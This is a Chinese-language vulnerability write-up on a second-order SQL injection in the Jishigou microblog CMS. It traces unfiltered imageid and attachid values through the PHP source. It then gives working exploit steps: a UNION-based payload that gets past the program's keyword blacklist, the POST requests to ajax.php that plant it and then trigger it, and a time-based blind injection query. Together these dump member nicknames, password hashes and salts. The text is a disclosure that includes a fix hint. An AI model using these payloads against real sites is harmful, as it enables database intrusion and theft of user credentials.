记事狗微博2次注入

测试版本:20140124

1 .分析

文件名:cms.mod.php
函数名:addcms
代码:
[php]
function addcms(){
if (MEMBER_ID < 1) {
response_text("请先登录或者注册一个帐号");
}

* master.mod.php : $this->Get = &$_GET; $this->Post = &$_POST; *

$aid = trim($this->Post['aid']); //传值 没有过滤操作啥的
$title = trim($this->Post['title']); //传值 没有过滤操作啥的
$catid = trim($this->Post['catid']); //传值 没有过滤操作啥的
$content = trim($this->Post['content']); //传值 没有过滤操作啥的
if(!$content){
$content = $title;
}
if (!$title){response_text("请输入标题");}
if (!$catid){response_text("请选择分类");}
if (!$content){response_text("请输入内容");}
$imageid = trim($this->Post['imageid']);
$attachid = trim($this->Post['attachid']);
$data = array(
'title' => $title,
'catid' => $catid,
'content' => $content,
'imageid' => $imageid,
'attachid' => $attachid,
);
if($aid > 0){ //aid
$return = jlogic('cms')->modify($aid,$data); //修改
}else{
$return = jlogic('cms')->create($data); //创建 我们跟进去看看
}
if($return >= 0){
if($aid > 0){
response_text("修改成功");
}else{
$str = $return > 0 ? '发布成功' : '发布成功,请等待管理员审核';
response_text($return."|||".$str."|||".date('Y-m-d H:i:s',time()));
}
}else{
response_text("操作失败,您没有相关操作权限");
}
}[/php]
文件名:cms.logic.php
函数名:create
代码:
[php]
function create($data) {
global $_J;
$category = $this->Getonecategory($data['catid']); // 判断cms_category 有没有这个值

/* function Getonecategory($catid=0) {
$row = DB::fetch_first("SELECT * FROM ".DB::table('cms_category')." WHERE catid = '$catid'");
return $row;
}
*/
if(MEMBER_ID > 0 && $category && (empty($category['purview']) || in_array($_J['member']['role_id'],explode(',',$category['purview'])) || in_array(MEMBER_ID,explode(',',$category['manageid'])))){
$check = $category['verify'] && !in_array(MEMBER_ID,explode(',',$category['manageid'])) && !in_array($_J['member']['role_id'],explode(',',$category['filter'])) ? 0 : 1;
$cmsdata = array(
'title' => jhtmlspecialchars($data['title']),
'content' => jhtmlspecialchars($data['content']),
'catid' => $data['catid'],
'imageid' => $data['imageid'], //值
'attachid' => $data['attachid'], //值
'likecatid' => $category['likecatid'],
' likemanageid' => $category['manageid'],
'dateline' => time(),
'uid' => MEMBER_ID,
'username' => MEMBER_NICKNAME,
'check' => $check,
);
$aid = DB::insert('cms_article', $cmsdata, true); //入库操作
(sql :
INSERT INTO jishigou_cms_article SET `title`='test',`content`='test',`catid`='1',`imageid`='143',`attachid`='aaaaaaaaaaaaa',`likecatid`='0',`likemanageid`='',`dateline`='1390917773',`uid`='1',`username`='admin',`check`='1'
)

if($data['imageid']){ // 值是为真 就是说这里有个注入 但是只能盲注把 mysql报错的话 都给记录在文件里了 .
DB::query("UPDATE ".DB::table('topic_image')." SET item='cms',itemid={$aid} WHERE id IN(".$data['imageid'].")");
}
if($data['attachid']){// 值是为真 就是说这里有个注入 但是只能盲注把 mysql报错的话 都给记录在文件里了
DB::query("UPDATE ".DB::table('topic_attach')." SET item='cms',itemid={$aid} WHERE id IN(".$data['attachid'].")");
}
if($check>0){
$this->update_cat_count($data['catid'],1,true);
}
$topicdata = array(
'content' => cut_str($data['content'], 140, ''),
'imageid' => $data['imageid'], //值
'attachid' => $data['attachid'], //值
'item' => 'cms',
'item_id' => $aid,
);
jlogic('topic')->Add($topicdata); //代码太长不贴了 最后 imageid和attachid都给get_ids的过滤了
return $check ? $aid : 0;
}else{
return -1; }
}[/php]
我们在找找谁操作了jishigou_cms_article这个表

文件名:cms.mod.php
函数名:publish
代码:
[php]
function publish(){
if(MEMBER_ID < 1){
response_text("

错误:请您先登录后再进行该操作!

");
exit;
}
$aid = jget('aid');
$fromcatid = $catid = jget('catid');
if($aid){ //aid有值进入
$cmsinfo = jlogic('cms')->getarticlebyid($aid); //跟进去
//好我们回来了 $cmsinfo 就是row 值
$uploadimages = $cmsinfo['images'];
if(!$cmsinfo['edit']){
response_text("

错误:您没有相关操作权限!

");
exit;
}
$catid = $cmsinfo['catid'];
}
$categoryselect = jlogic('cms')->get_category_html($catid);
$h_key = 'cms';
$albums = jlogic('image')->getalbum();

include template('cms/publish'); //看这个包含了模版 我们来看看
文件名: \ cms\publish.html
//如果有这个变量存在
//循环便利值

 

 



}[/php]
文件名:cms.logic.php
函数名:getarticlebyid
代码:
[php]
$row = DB::fetch_first("SELECT * FROM ".DB::table('cms_article')." WHERE aid = '$aid'"); //查询我们发的文章有木有
if($row){
$row['edit'] = (MEMBER_ID > 0 && (MEMBER_ROLE_TYPE == 'admin' || in_array(MEMBER_ID,explode(',',$row['likemanageid'])) || ($row['uid']==MEMBER_ID && !$row['check']))) ? 1 : 0;
if($row['imageid']){ 文章有图片id的话就进来
$query = DB::query("SELECT * FROM ".DB::table('topic_image')." WHERE id IN(".$row['imageid'].")"); //看这里用了 $row['imageid']来查询 而我们$row['imageid']是可以控制的
while ($value = DB::fetch($query)){
//以下一些传值操作
$image = str_replace('./','',str_replace('_o.jpg','_s.jpg',$value['photo']));
$row['images'][$value['id']]['img'] = $value['site_url'] ? $value['site_url'].'/'.$image : $image; //传值
}
}

if($row['attachid']){ 文章有附件id的话就进来
$query = DB::query("SELECT * FROM ".DB::table('topic_attach')." WHERE id IN(".$row['attachid'].")");//看这里用了 $row['attachid'] 来查询 而我们$row['attachid']是可以控制的
$candown = jclass('member')->HasPermission('uploadattach','down');
$canviewtype = array('doc','ppt','pdf','xls','txt','docx','xlsx','pptx');
//以下一些传值操作
while ($value = DB::fetch($query)){
$attach_url = ($value['site_url'] ? $value['site_url'] : $GLOBALS['_J']['site_url']).'/'.str_replace('./','',$value['file']);
echo($value);
$row['attachs'][$value['id']]['img'] = 'images/filetype/'.$value['filetype'].'.gif'; //
$row['attachs'][$value['id']]['name'] = $value['name'];
$row['attachs'][$value['id']]['score'] = $value['score'];
$row['attachs'][$value['id']]['onlineview'] = ($candown && in_array($value['filetype'],$canviewtype) && $value['score']==0) ? $attach_url : '';
}
}
}
最后返回 $row 值 (数据库) //[b][color=Red]在看上一个代码 cms.mod.php[/color][/b]
return $row;
}[/php]
2.利用

因为 程序里面有一系列的限制
检测到 #, -- ,/**/,load_file,hex,substring,substr,ord,char,benchmark,@,intooutfile,intodumpfile,unionselect,unionall,uniondistinct就终止执行了

[php]SELECT * FROM ".DB::table('topic_image')." WHERE id IN(".$row['imageid'].")[/php]

我们可以这样
[php]
0)UNION(SELECT 1,2,3,nickname,PASSWORD,1,1,1,1,1,1,1,1,1,1,salt,1 FROM jishigou_members[/php]
来绕过它的限制

好了 第一步先发文章
ajax.php?mod=cms&code=addcms
(post提交)
[php]
title=test&catid=1&aid=0&imageid=143&attachid=0)UNION(SELECT nickname,2,3,4,1,1,1,1,PASSWORD,1,1,1,1,1,1,salt,1 FROM jishigou_members
[/php]
由于这个程序里默认是没有文章分类的所有还是有点鸡肋把catid
但是盲注也太慢了!
执行完后会给你个 id 我这边是19

返回信息提示:[php]
19|||发布成功|||2014-01-28 22:58:20
[/php]
我去发不了图片。。

第2步
[php]
/ajax.php?mod=cms&code=publish

post
aid=19
[/php]
密码就显示出来

3.后话

过滤所有的 $imageid $attachid
里面还有其他的盲注也是这两个变量造成的
例如发送私信那里

盲注:
[php]
SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 43, NULL, SLEEP(1)) FROM jishigou_members[/php]

发表评论